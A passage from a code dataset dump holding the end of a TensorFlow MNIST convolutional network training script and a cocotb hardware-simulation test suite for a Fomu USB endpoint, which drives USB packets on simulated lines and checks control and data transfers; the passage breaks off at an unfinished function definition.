tf.Variable(tf.random_normal([32])),\n 'bias2': tf.Variable(tf.random_normal([64])),\n 'bias3': tf.Variable(tf.random_normal([1024])),\n 'bias4': tf.Variable(tf.random_normal([no_of_outputs]))\n}\n\n\ndef conv(x, W, b, strides=1):\n # Conv wrapper, with bias and relu activation\n x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='SAME')\n x = tf.nn.bias_add(x, b)\n return tf.nn.relu(x)\n\n\ndef find_maxpool(x, k=2):\n # MaxPool wrapper\n max_pool = tf.nn.max_pool(x, ksize=[1, k, k, 1], strides=[1, k, k, 1], padding='SAME')\n return max_pool\n\n\ndef conv_layer(x, weights, bias, drop_out):\n x = tf.reshape(x, shape=[-1, 28, 28, 1])\n\n # First Convolution Layer\n conv1 = conv(x, weights['weight1'], bias['bias1'])\n # Max Pooling\n conv1 = find_maxpool(conv1, k=2)\n\n # Second Convolution Layer\n conv2 = conv(conv1, weights['weight2'], bias['bias2'])\n # Max Pooling\n conv2 = find_maxpool(conv2, k=2)\n\n # Fully connected layer\n # Reshape conv2 output to fit fully connected layer input\n fc1 = tf.reshape(conv2, [-1, weights['weight3'].get_shape().as_list()[0]])\n fc1 = tf.add(tf.matmul(fc1, weights['weight3']), bias['bias3'])\n fc1 = tf.nn.relu(fc1)\n # Apply Dropout\n fc1 = tf.nn.dropout(fc1, drop_out)\n\n # Output, class prediction\n output = tf.add(tf.matmul(fc1, weights['weight4']), bias['bias4'])\n return output\n\n\npred = conv_layer(input_data, weights, bias, keep_prob)\n\n# Define loss and optimizer\n# cost = tf.reduce_sum(tf.pow(pred - output_data, 2)) / 2\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, output_data))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n# Evaluate model\ncorrect_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(output_data, 1))\naccuracy = tf.mul(100.0, tf.reduce_mean(tf.cast(correct_pred, tf.float32)))\n\n# Initializing the variables\ninit = tf.initialize_all_variables()\n\n# Launch the graph\nwith tf.Session() as sess:\n sess.run(init)\n step = 1\n # Keep training until reach max iterations\n for epoch in range(epochs):\n batch_x, batch_y = mnist.train.next_batch(batch_size)\n sess.run(optimizer, feed_dict={input_data: batch_x, output_data: batch_y,\n keep_prob: drop_out})\n if epoch % display_step == 0:\n # Calculate batch loss and accuracy\n 
loss, acc = sess.run([cost, accuracy], feed_dict={input_data: batch_x,\n output_data: batch_y,\n keep_prob: 1.})\n print(\"Iter \", epoch, \" Mini batch Loss= \", \"{:.3f}\".format(\n loss) + \", Training Accuracy= \", \"{:.3f}\".format(acc))\n step += 1\n print(\"Optimization Finished!\")\n print(\"Total test data length: \", len(mnist.test.images))\n print(\"Testing Accuracy :\", sess.run(accuracy, feed_dict={input_data: mnist.test.images[:],\n output_data: mnist.test.labels[:],\n keep_prob: 1.}))\n","sub_path":"models/simple_ccn_for_MNIST.py","file_name":"simple_ccn_for_MNIST.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"640578501","text":"# Tests for the Fomu Tri-Endpoint\nimport cocotb\nfrom cocotb.clock import Clock\nfrom cocotb.triggers import RisingEdge, NullTrigger, Timer\nfrom cocotb.result import TestFailure, TestSuccess, ReturnValue\n\nfrom valentyusb.usbcore.utils.packet import *\nfrom valentyusb.usbcore.endpoint import *\nfrom valentyusb.usbcore.pid import *\nfrom valentyusb.usbcore.utils.pprint import pp_packet\n\nfrom wishbone import WishboneMaster, WBOp\n\nimport logging\nimport csv\n\ndef grouper_tofit(n, iterable):\n from itertools import zip_longest\n \"\"\"Group iterable into multiples of n, except don't leave\n trailing None values at the end.\n \"\"\"\n # itertools.zip_longest is broken because it requires you to fill in some\n # value, and doesn't mention anything else in its documentation that would\n # not require this behavior.\n # Re-do the array to shrink it down if any None values are discovered.\n broken = zip_longest(*[iter(iterable)]*n, fillvalue=None)\n fixed = []\n for e in broken:\n f = []\n for el in e:\n if el is not None:\n f.append(el)\n fixed.append(f)\n return fixed\n\nclass UsbTest:\n def __init__(self, dut):\n self.dut = dut\n self.csrs = dict()\n with open(\"csr.csv\", newline='') as csr_csv_file:\n csr_csv = csv.reader(csr_csv_file)\n # csr_register format: csr_register, name, address, size, rw/ro\n for row in csr_csv:\n if row[0] == 'csr_register':\n self.csrs[row[1]] = int(row[2], base=0)\n cocotb.fork(Clock(dut.clk48, 20800, 'ps').start())\n self.wb = WishboneMaster(dut, \"wishbone\", dut.clk12, timeout=20)\n\n # Set the signal \"test_name\" to match this test\n import inspect\n tn = cocotb.binary.BinaryValue(value=None, n_bits=4096)\n tn.buff = inspect.stack()[1][3]\n self.dut.test_name = tn\n\n @cocotb.coroutine\n def reset(self):\n\n self.dut.reset = 1\n yield RisingEdge(self.dut.clk12)\n self.dut.reset = 0\n yield RisingEdge(self.dut.clk12)\n\n self.dut.usb_d_p = 1\n self.dut.usb_d_n = 0\n\n yield self.disconnect()\n\n # Enable endpoint 0\n yield self.write(self.csrs['usb_enable_out0'], 0xff)\n yield self.write(self.csrs['usb_enable_out1'], 0xff)\n yield self.write(self.csrs['usb_enable_in0'], 0xff)\n yield self.write(self.csrs['usb_enable_in1'], 0xff)\n\n @cocotb.coroutine\n def write(self, addr, val):\n yield self.wb.write(addr, val)\n\n @cocotb.coroutine\n def read(self, addr):\n value = yield self.wb.read(addr)\n raise ReturnValue(value)\n\n @cocotb.coroutine\n def connect(self):\n USB_PULLUP_OUT = self.csrs['usb_pullup_out']\n yield self.write(USB_PULLUP_OUT, 1)\n\n @cocotb.coroutine\n def clear_pending(self, _ep):\n yield Timer(0)\n\n @cocotb.coroutine\n def disconnect(self):\n USB_PULLUP_OUT = self.csrs['usb_pullup_out']\n yield self.write(USB_PULLUP_OUT, 0)\n\n def assertEqual(self, a, b, msg):\n if a != b:\n raise 
TestFailure(\"{} != {} - {}\".format(a, b, msg))\n\n def assertSequenceEqual(self, a, b, msg):\n if a != b:\n raise TestFailure(\"{} vs {} - {}\".format(a, b, msg))\n\n def print_ep(self, epaddr, msg, *args):\n self.dut._log.info(\"ep(%i, %s): %s\" % (\n EndpointType.epnum(epaddr),\n EndpointType.epdir(epaddr).name,\n msg) % args)\n\n # Host->Device\n @cocotb.coroutine\n def _host_send_packet(self, packet):\n \"\"\"Send a USB packet.\"\"\"\n\n # Packet gets multiplied by 4x so we can send using the\n # usb48 clock instead of the usb12 clock.\n packet = 'JJJJJJJJ' + wrap_packet(packet)\n self.assertEqual('J', packet[-1], \"Packet didn't end in J: \"+packet)\n\n for v in packet:\n if v == '0' or v == '_':\n # SE0 - both lines pulled low\n self.dut.usb_d_p <= 0\n self.dut.usb_d_n <= 0\n elif v == '1':\n # SE1 - illegal, should never occur\n self.dut.usb_d_p <= 1\n self.dut.usb_d_n <= 1\n elif v == '-' or v == 'I':\n # Idle\n self.dut.usb_d_p <= 1\n self.dut.usb_d_n <= 0\n elif v == 'J':\n self.dut.usb_d_p <= 1\n self.dut.usb_d_n <= 0\n elif v == 'K':\n self.dut.usb_d_p <= 0\n self.dut.usb_d_n <= 1\n else:\n raise TestFailure(\"Unknown value: %s\" % v)\n yield RisingEdge(self.dut.clk48)\n\n @cocotb.coroutine\n def host_send_token_packet(self, pid, addr, ep):\n epnum = EndpointType.epnum(ep)\n yield self._host_send_packet(token_packet(pid, addr, epnum))\n\n @cocotb.coroutine\n def host_send_data_packet(self, pid, data):\n assert pid in (PID.DATA0, PID.DATA1), pid\n yield self._host_send_packet(data_packet(pid, data))\n\n @cocotb.coroutine\n def host_send_sof(self, time):\n yield self._host_send_packet(sof_packet(time))\n\n @cocotb.coroutine\n def host_send_ack(self):\n yield self._host_send_packet(handshake_packet(PID.ACK))\n\n @cocotb.coroutine\n def host_send(self, data01, addr, epnum, data, expected=PID.ACK):\n \"\"\"Send data out the virtual USB connection, including an OUT token\"\"\"\n yield self.host_send_token_packet(PID.OUT, addr, epnum)\n yield self.host_send_data_packet(data01, data)\n yield self.host_expect_packet(handshake_packet(expected), \"Expected {} packet.\".format(expected))\n\n\n @cocotb.coroutine\n def host_setup(self, addr, epnum, data):\n \"\"\"Send data out the virtual USB connection, including a SETUP token\"\"\"\n yield self.host_send_token_packet(PID.SETUP, addr, epnum)\n yield self.host_send_data_packet(PID.DATA0, data)\n yield self.host_expect_ack()\n\n @cocotb.coroutine\n def host_recv(self, data01, addr, epnum, data):\n \"\"\"Send data out the virtual USB connection, including an IN token\"\"\"\n yield self.host_send_token_packet(PID.IN, addr, epnum)\n yield self.host_expect_data_packet(data01, data)\n yield self.host_send_ack()\n\n # Device->Host\n @cocotb.coroutine\n def host_expect_packet(self, packet, msg=None):\n \"\"\"Except to receive the following USB packet.\"\"\"\n\n def current():\n values = (self.dut.usb_d_p, self.dut.usb_d_n)\n\n if values == (0, 0):\n return '_'\n elif values == (1, 1):\n return '1'\n elif values == (1, 0):\n return 'J'\n elif values == (0, 1):\n return 'K'\n else:\n raise TestFailure(\"Unrecognized dut values: {}\".format(values))\n\n # Wait for transmission to start\n tx = 0\n bit_times = 0\n for i in range(0, 100):\n tx = self.dut.usb_tx_en\n if tx == 1:\n break\n yield RisingEdge(self.dut.clk48)\n bit_times = bit_times + 1\n if tx != 1:\n raise TestFailure(\"No packet started, \" + msg)\n\n # # USB specifies that the turn-around time is 7.5 bit times for the device\n bit_time_max = 12.5\n bit_time_acceptable = 7.5\n if 
(bit_times/4.0) > bit_time_max:\n raise TestFailure(\"Response came after {} bit times, which is more than {}\".format(bit_times / 4.0, bit_time_max))\n if (bit_times/4.0) > bit_time_acceptable:\n self.dut._log.warn(\"Response came after {} bit times (> {})\".format(bit_times / 4.0, bit_time_acceptable))\n else:\n self.dut._log.info(\"Response came after {} bit times\".format(bit_times / 4.0))\n\n # Read in the transmission data\n result = \"\"\n for i in range(0, 1024):\n result += current()\n yield RisingEdge(self.dut.clk48)\n if self.dut.usb_tx_en != 1:\n break\n if tx == 1:\n raise TestFailure(\"Packet didn't finish, \" + msg)\n self.dut.usb_d_p = 1\n self.dut.usb_d_n = 0\n\n # Check the packet received matches\n expected = pp_packet(wrap_packet(packet))\n actual = pp_packet(result)\n self.assertSequenceEqual(expected, actual, msg)\n\n @cocotb.coroutine\n def host_expect_ack(self):\n yield self.host_expect_packet(handshake_packet(PID.ACK), \"Expected ACK packet.\")\n\n @cocotb.coroutine\n def host_expect_nak(self):\n yield self.host_expect_packet(handshake_packet(PID.NAK), \"Expected NAK packet.\")\n\n @cocotb.coroutine\n def host_expect_stall(self):\n yield self.host_expect_packet(handshake_packet(PID.STALL), \"Expected STALL packet.\")\n\n @cocotb.coroutine\n def host_expect_data_packet(self, pid, data):\n assert pid in (PID.DATA0, PID.DATA1), pid\n yield self.host_expect_packet(data_packet(pid, data), \"Expected %s packet with %r\" % (pid.name, data))\n\n @cocotb.coroutine\n def pending(self, ep):\n if EndpointType.epdir(ep) == EndpointType.IN:\n val = yield self.read(self.csrs['usb_epin_status'])\n else:\n val = yield self.read(self.csrs['usb_epout_status'])\n raise ReturnValue(val & 1)\n\n @cocotb.coroutine\n def expect_setup(self, epaddr, expected_data):\n actual_data = []\n # wait for data to appear\n for i in range(128):\n self.dut._log.debug(\"Prime loop {}\".format(i))\n status = yield self.read(self.csrs['usb_setup_status'])\n have = status & 1\n if have:\n break\n yield RisingEdge(self.dut.clk12)\n\n for i in range(48):\n self.dut._log.debug(\"Read loop {}\".format(i))\n status = yield self.read(self.csrs['usb_setup_status'])\n have = status & 1\n if not have:\n break\n v = yield self.read(self.csrs['usb_setup_data'])\n yield self.write(self.csrs['usb_setup_ctrl'], 1)\n actual_data.append(v)\n yield RisingEdge(self.dut.clk12)\n\n if len(actual_data) < 2:\n raise TestFailure(\"data was short (got {}, expected {})\".format(expected_data, actual_data))\n actual_data, actual_crc16 = actual_data[:-2], actual_data[-2:]\n\n self.print_ep(epaddr, \"Got: %r (expected: %r)\", actual_data, expected_data)\n self.assertSequenceEqual(expected_data, actual_data, \"SETUP packet not received\")\n self.assertSequenceEqual(crc16(expected_data), actual_crc16, \"CRC16 not valid\")\n\n @cocotb.coroutine\n def expect_data(self, epaddr, expected_data, expected):\n actual_data = []\n # wait for data to appear\n for i in range(128):\n self.dut._log.debug(\"Prime loop {}\".format(i))\n status = yield self.read(self.csrs['usb_epout_status'])\n have = status & 1\n if have:\n break\n yield RisingEdge(self.dut.clk12)\n\n for i in range(256):\n self.dut._log.debug(\"Read loop {}\".format(i))\n status = yield self.read(self.csrs['usb_epout_status'])\n have = status & 1\n if not have:\n break\n v = yield self.read(self.csrs['usb_epout_data'])\n yield self.write(self.csrs['usb_epout_ctrl'], 3)\n actual_data.append(v)\n yield RisingEdge(self.dut.clk12)\n\n if expected == PID.ACK:\n if len(actual_data) < 2:\n 
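# an ACKed data packet always ends with a 2-byte CRC16, so fewer than 2 bytes means a malformed payload\n                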
raise TestFailure(\"data {} was short\".format(actual_data))\n actual_data, actual_crc16 = actual_data[:-2], actual_data[-2:]\n\n self.print_ep(epaddr, \"Got: %r (expected: %r)\", actual_data, expected_data)\n self.assertSequenceEqual(expected_data, actual_data, \"DATA packet not correctly received\")\n self.assertSequenceEqual(crc16(expected_data), actual_crc16, \"CRC16 not valid\")\n\n @cocotb.coroutine\n def set_response(self, ep, response):\n if EndpointType.epdir(ep) == EndpointType.IN and response == EndpointResponse.ACK:\n yield self.write(self.csrs['usb_epin_epno'], EndpointType.epnum(ep))\n\n @cocotb.coroutine\n def send_data(self, token, ep, data):\n for b in data:\n yield self.write(self.csrs['usb_epin_data'], b)\n yield self.write(self.csrs['usb_epin_epno'], ep)\n\n @cocotb.coroutine\n def transaction_setup(self, addr, data, epnum=0):\n epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n\n xmit = cocotb.fork(self.host_setup(addr, epnum, data))\n yield self.expect_setup(epaddr_out, data)\n yield xmit.join()\n\n @cocotb.coroutine\n def transaction_data_out(self, addr, ep, data, chunk_size=64, expected=PID.ACK):\n epnum = EndpointType.epnum(ep)\n datax = PID.DATA1\n\n # # Set it up so we ACK the final IN packet\n # yield self.write(self.csrs['usb_epin_epno'], 0)\n for _i, chunk in enumerate(grouper_tofit(chunk_size, data)):\n self.dut._log.warning(\"Sening {} bytes to host\".format(len(chunk)))\n # Enable receiving data\n yield self.write(self.csrs['usb_epout_ctrl'], (1 << 1))\n xmit = cocotb.fork(self.host_send(datax, addr, epnum, chunk, expected))\n yield self.expect_data(epnum, list(chunk), expected)\n yield xmit.join()\n\n if datax == PID.DATA0:\n datax = PID.DATA1\n else:\n datax = PID.DATA0\n\n @cocotb.coroutine\n def transaction_data_in(self, addr, ep, data, chunk_size=64):\n epnum = EndpointType.epnum(ep)\n datax = PID.DATA1\n sent_data = 0\n for i, chunk in enumerate(grouper_tofit(chunk_size, data)):\n sent_data = 1\n self.dut._log.debug(\"Actual data we're expecting: {}\".format(chunk))\n for b in chunk:\n yield self.write(self.csrs['usb_epin_data'], b)\n yield self.write(self.csrs['usb_epin_epno'], epnum)\n recv = cocotb.fork(self.host_recv(datax, addr, epnum, chunk))\n yield recv.join()\n\n if datax == PID.DATA0:\n datax = PID.DATA1\n else:\n datax = PID.DATA0\n if not sent_data:\n yield self.write(self.csrs['usb_epin_epno'], epnum)\n recv = cocotb.fork(self.host_recv(datax, addr, epnum, []))\n yield self.send_data(datax, epnum, data)\n yield recv.join()\n\n @cocotb.coroutine\n def set_data(self, ep, data):\n _epnum = EndpointType.epnum(ep)\n for b in data:\n yield self.write(self.csrs['usb_epin_data'], b)\n\n @cocotb.coroutine\n def transaction_status_in(self, addr, ep):\n epnum = EndpointType.epnum(ep)\n assert EndpointType.epdir(ep) == EndpointType.IN\n xmit = cocotb.fork(self.host_recv(PID.DATA1, addr, epnum, []))\n yield xmit.join()\n\n @cocotb.coroutine\n def transaction_status_out(self, addr, ep):\n epnum = EndpointType.epnum(ep)\n assert EndpointType.epdir(ep) == EndpointType.OUT\n xmit = cocotb.fork(self.host_send(PID.DATA1, addr, epnum, []))\n yield xmit.join()\n\n @cocotb.coroutine\n def control_transfer_out(self, addr, setup_data, descriptor_data=None):\n epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n\n if (setup_data[0] & 0x80) == 0x80:\n raise Exception(\"setup_data indicated an IN transfer, but you requested an OUT transfer\")\n\n # 
Setup stage\n        self.dut._log.info(\"setup stage\")\n        yield self.transaction_setup(addr, setup_data)\n\n        # Data stage\n        if (setup_data[7] != 0 or setup_data[6] != 0) and descriptor_data is None:\n            raise Exception(\"setup_data indicates data, but no descriptor data was specified\")\n        if (setup_data[7] == 0 and setup_data[6] == 0) and descriptor_data is not None:\n            raise Exception(\"setup_data indicates no data, but descriptor data was specified\")\n        if descriptor_data is not None:\n            self.dut._log.info(\"data stage\")\n            yield self.transaction_data_out(addr, epaddr_out, descriptor_data)\n\n        # Status stage\n        self.dut._log.info(\"status stage\")\n        # yield self.set_response(epaddr_in, EndpointResponse.ACK)\n        yield self.transaction_status_in(addr, epaddr_in)\n\n    @cocotb.coroutine\n    def control_transfer_in(self, addr, setup_data, descriptor_data=None):\n        epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n        epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n\n        if (setup_data[0] & 0x80) == 0x00:\n            raise Exception(\"setup_data indicated an OUT transfer, but you requested an IN transfer\")\n\n        # Setup stage\n        self.dut._log.info(\"setup stage\")\n        yield self.transaction_setup(addr, setup_data)\n\n        # Data stage\n        if (setup_data[7] != 0 or setup_data[6] != 0) and descriptor_data is None:\n            raise Exception(\"setup_data indicates data, but no descriptor data was specified\")\n        if (setup_data[7] == 0 and setup_data[6] == 0) and descriptor_data is not None:\n            raise Exception(\"setup_data indicates no data, but descriptor data was specified\")\n        if descriptor_data is not None:\n            self.dut._log.info(\"data stage\")\n            yield self.transaction_data_in(addr, epaddr_in, descriptor_data)\n\n        # Status stage\n        self.dut._log.info(\"status stage\")\n        # yield self.set_response(epaddr_in, EndpointResponse.ACK)\n        yield self.transaction_status_out(addr, epaddr_out)\n\n@cocotb.test()\ndef iobuf_validate(dut):\n    \"\"\"Sanity test that the Wishbone bus actually works\"\"\"\n    harness = UsbTest(dut)\n    yield harness.reset()\n\n    USB_PULLUP_OUT = harness.csrs['usb_pullup_out']\n    val = yield harness.read(USB_PULLUP_OUT)\n    dut._log.info(\"Value at start: {}\".format(val))\n    if dut.usb_pullup != 0:\n        raise TestFailure(\"USB pullup didn't start at zero\")\n\n    yield harness.write(USB_PULLUP_OUT, 1)\n\n    val = yield harness.read(USB_PULLUP_OUT)\n    dut._log.info(\"Memory value: {}\".format(val))\n    if val != 1:\n        raise TestFailure(\"USB pullup is not set!\")\n    raise TestSuccess(\"iobuf validated\")\n\n@cocotb.test()\ndef test_control_setup(dut):\n    harness = UsbTest(dut)\n    yield harness.reset()\n    yield harness.connect()\n    #                      012345   0123\n    #                    0b011100 0b1000\n    yield harness.write(harness.csrs['usb_address'], 28)\n    yield harness.transaction_setup(28, [0x80, 0x06, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00])\n    yield harness.transaction_data_in(28, 0, [])\n\n@cocotb.test()\ndef test_control_transfer_in(dut):\n    harness = UsbTest(dut)\n    yield harness.reset()\n\n    yield harness.connect()\n    yield harness.write(harness.csrs['usb_address'], 20)\n    yield harness.control_transfer_in(\n        20,\n        # Get descriptor, Index 0, Type 03, LangId 0000, wLength 10?\n        [0x80, 0x06, 0x00, 0x06, 0x00, 0x00, 0x0A, 0x00],\n        # 12 byte descriptor, max packet size 8 bytes\n        [0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,\n         0x08, 0x09, 0x0A, 0x0B],\n    )\n\n@cocotb.test()\ndef test_sof_stuffing(dut):\n    harness = UsbTest(dut)\n    yield harness.reset()\n\n    yield harness.connect()\n    yield harness.host_send_sof(0x04ff)\n    yield harness.host_send_sof(0x0512)\n    yield 
harness.host_send_sof(0x06e1)\n yield harness.host_send_sof(0x0519)\n\n@cocotb.test()\ndef test_sof_is_ignored(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n addr = 0x20\n epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n yield harness.write(harness.csrs['usb_address'], addr)\n\n data = [0, 1, 8, 0, 4, 3, 0, 0]\n @cocotb.coroutine\n def send_setup_and_sof():\n # Send SOF packet\n yield harness.host_send_sof(2)\n\n # Setup stage\n # ------------------------------------------\n # Send SETUP packet\n yield harness.host_send_token_packet(PID.SETUP, addr, EndpointType.epnum(epaddr_out))\n\n # Send another SOF packet\n yield harness.host_send_sof(3)\n\n # Data stage\n # ------------------------------------------\n # Send DATA packet\n yield harness.host_send_data_packet(PID.DATA1, data)\n yield harness.host_expect_ack()\n\n # Send another SOF packet\n yield harness.host_send_sof(4)\n\n # Indicate that we're ready to receive data to EP0\n # harness.write(harness.csrs['usb_epin_epno'], 0)\n\n xmit = cocotb.fork(send_setup_and_sof())\n yield harness.expect_setup(epaddr_out, data)\n yield xmit.join()\n\n # # Status stage\n # # ------------------------------------------\n yield harness.set_response(epaddr_out, EndpointResponse.ACK)\n yield harness.transaction_status_out(addr, epaddr_out)\n\n@cocotb.test()\ndef test_control_setup_clears_stall(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n addr = 28\n epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n yield harness.write(harness.csrs['usb_address'], addr)\n\n d = [0x1, 0x2, 0x3, 0x4, 0x5, 0x6, 0, 0]\n\n # Send the data -- just to ensure that things are working\n yield harness.transaction_data_out(addr, epaddr_out, d)\n\n # Send it again to ensure we can re-queue things.\n yield harness.transaction_data_out(addr, epaddr_out, d)\n\n # STALL the endpoint now\n yield harness.write(harness.csrs['usb_enable_out0'], 0)\n yield harness.write(harness.csrs['usb_enable_out1'], 0)\n yield harness.write(harness.csrs['usb_enable_in0'], 0)\n yield harness.write(harness.csrs['usb_enable_in1'], 0)\n\n # Do another receive, which should fail\n yield harness.transaction_data_out(addr, epaddr_out, d, expected=PID.STALL)\n\n # Do a SETUP, which should pass\n yield harness.write(harness.csrs['usb_enable_out0'], 1)\n yield harness.control_transfer_out(addr, d)\n\n # Finally, do one last transfer, which should succeed now\n # that the endpoint is unstalled.\n yield harness.transaction_data_out(addr, epaddr_out, d)\n\n@cocotb.test()\ndef test_control_transfer_in_nak_data(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n addr = 22\n yield harness.write(harness.csrs['usb_address'], addr)\n # Get descriptor, Index 0, Type 03, LangId 0000, wLength 64\n setup_data = [0x80, 0x06, 0x00, 0x03, 0x00, 0x00, 0x40, 0x00]\n in_data = [0x04, 0x03, 0x09, 0x04]\n\n epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n # yield harness.clear_pending(epaddr_in)\n\n yield harness.write(harness.csrs['usb_address'], addr)\n\n # Setup stage\n # -----------\n yield harness.transaction_setup(addr, setup_data)\n\n # Data stage\n # -----------\n yield harness.set_response(epaddr_in, EndpointResponse.NAK)\n yield harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n yield harness.host_expect_nak()\n\n yield harness.set_data(epaddr_in, in_data)\n yield harness.set_response(epaddr_in, EndpointResponse.ACK)\n yield 
harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n yield harness.host_expect_data_packet(PID.DATA1, in_data)\n yield harness.host_send_ack()\n\n# @cocotb.test()\n# def test_control_transfer_in_nak_status(dut):\n# harness = UsbTest(dut)\n# yield harness.reset()\n# yield harness.connect()\n\n# addr = 20\n# setup_data = [0x00, 0x06, 0x00, 0x06, 0x00, 0x00, 0x0A, 0x00]\n# out_data = [0x00, 0x01]\n\n# epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n# epaddr_in = EndpointType.epaddr(0, EndpointType.IN)\n# yield harness.clear_pending(epaddr_out)\n# yield harness.clear_pending(epaddr_in)\n\n# # Setup stage\n# # -----------\n# yield harness.transaction_setup(addr, setup_data)\n\n# # Data stage\n# # ----------\n# yield harness.set_response(epaddr_out, EndpointResponse.ACK)\n# yield harness.transaction_data_out(addr, epaddr_out, out_data)\n\n# # Status stage\n# # ----------\n# yield harness.set_response(epaddr_in, EndpointResponse.NAK)\n\n# yield harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n# yield harness.host_expect_nak()\n\n# yield harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n# yield harness.host_expect_nak()\n\n# yield harness.set_response(epaddr_in, EndpointResponse.ACK)\n# yield harness.host_send_token_packet(PID.IN, addr, epaddr_in)\n# yield harness.host_expect_data_packet(PID.DATA1, [])\n# yield harness.host_send_ack()\n# yield harness.clear_pending(epaddr_in)\n\n\n@cocotb.test()\ndef test_control_transfer_in(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n yield harness.clear_pending(EndpointType.epaddr(0, EndpointType.OUT))\n yield harness.clear_pending(EndpointType.epaddr(0, EndpointType.IN))\n yield harness.write(harness.csrs['usb_address'], 20)\n\n yield harness.control_transfer_in(\n 20,\n # Get descriptor, Index 0, Type 03, LangId 0000, wLength 10?\n [0x80, 0x06, 0x00, 0x06, 0x00, 0x00, 0x0A, 0x00],\n # 12 byte descriptor, max packet size 8 bytes\n [0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,\n 0x08, 0x09, 0x0A, 0x0B],\n )\n\n@cocotb.test()\ndef test_control_transfer_in_out(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n yield harness.clear_pending(EndpointType.epaddr(0, EndpointType.OUT))\n yield harness.clear_pending(EndpointType.epaddr(0, EndpointType.IN))\n yield harness.write(harness.csrs['usb_address'], 20)\n\n yield harness.control_transfer_in(\n 20,\n # Get device descriptor\n [0x80, 0x06, 0x00, 0x01, 0x00, 0x00, 0x40, 00],\n # 18 byte descriptor, max packet size 8 bytes\n [0x12, 0x01, 0x10, 0x02, 0x02, 0x00, 0x00, 0x40,\n 0x09, 0x12, 0xB1, 0x70, 0x01, 0x01, 0x01, 0x02,\n 00, 0x01],\n )\n\n yield harness.control_transfer_out(\n 20,\n # Set address (to 11)\n [0x00, 0x05, 0x0B, 0x00, 0x00, 0x00, 0x00, 0x00],\n # 18 byte descriptor, max packet size 8 bytes\n None,\n )\n\n# @cocotb.test()\n# def test_control_transfer_out_nak_data(dut):\n# harness = UsbTest(dut)\n# yield harness.reset()\n# yield harness.connect()\n\n# addr = 20\n# setup_data = [0x80, 0x06, 0x00, 0x06, 0x00, 0x00, 0x0A, 0x00]\n# out_data = [\n# 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,\n# 0x08, 0x09, 0x0A, 0x0B,\n# ]\n\n# epaddr_out = EndpointType.epaddr(0, EndpointType.OUT)\n# yield harness.clear_pending(epaddr_out)\n\n# # Setup stage\n# # -----------\n# yield harness.transaction_setup(addr, setup_data)\n\n# # Data stage\n# # ----------\n# yield harness.set_response(epaddr_out, EndpointResponse.NAK)\n# yield harness.host_send_token_packet(PID.OUT, addr, epaddr_out)\n# yield 
harness.host_send_data_packet(PID.DATA1, out_data)\n# yield harness.host_expect_nak()\n\n# yield harness.host_send_token_packet(PID.OUT, addr, epaddr_out)\n# yield harness.host_send_data_packet(PID.DATA1, out_data)\n# yield harness.host_expect_nak()\n\n# #for i in range(200):\n# # yield\n\n# yield harness.set_response(epaddr_out, EndpointResponse.ACK)\n# yield harness.host_send_token_packet(PID.OUT, addr, epaddr_out)\n# yield harness.host_send_data_packet(PID.DATA1, out_data)\n# yield harness.host_expect_ack()\n# yield harness.host_expect_data(epaddr_out, out_data)\n# yield harness.clear_pending(epaddr_out)\n\n@cocotb.test()\ndef test_in_transfer(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n addr = 28\n epaddr = EndpointType.epaddr(1, EndpointType.IN)\n yield harness.write(harness.csrs['usb_address'], addr)\n\n d = [0x1, 0x2, 0x3, 0x4, 0x5, 0x6, 0x7, 0x8]\n\n yield harness.clear_pending(epaddr)\n yield harness.set_response(epaddr, EndpointResponse.NAK)\n\n yield harness.set_data(epaddr, d[:4])\n yield harness.set_response(epaddr, EndpointResponse.ACK)\n yield harness.host_send_token_packet(PID.IN, addr, epaddr)\n yield harness.host_expect_data_packet(PID.DATA1, d[:4])\n yield harness.host_send_ack()\n\n pending = yield harness.pending(epaddr)\n if pending:\n raise TestFailure(\"data was still pending\")\n yield harness.clear_pending(epaddr)\n yield harness.set_data(epaddr, d[4:])\n yield harness.set_response(epaddr, EndpointResponse.ACK)\n\n yield harness.host_send_token_packet(PID.IN, addr, epaddr)\n yield harness.host_expect_data_packet(PID.DATA0, d[4:])\n yield harness.host_send_ack()\n\n@cocotb.test()\ndef test_in_transfer_stuff_last(dut):\n harness = UsbTest(dut)\n yield harness.reset()\n yield harness.connect()\n\n addr = 28\n epaddr = EndpointType.epaddr(1, EndpointType.IN)\n yield harness.write(harness.csrs['usb_address'], addr)\n\n d = [0x37, 0x75, 0x00, 0xe0]\n\n yield harness.clear_pending(epaddr)\n yield harness.set_response(epaddr, EndpointResponse.NAK)\n\n yield harness.set_data(epaddr, d)\n yield harness.set_response(epaddr, EndpointResponse.ACK)\n yield harness.host_send_token_packet(PID.IN, addr, epaddr)\n yield harness.host_expect_data_packet(PID.DATA1, d)\n\n@cocotb.test()\ndef 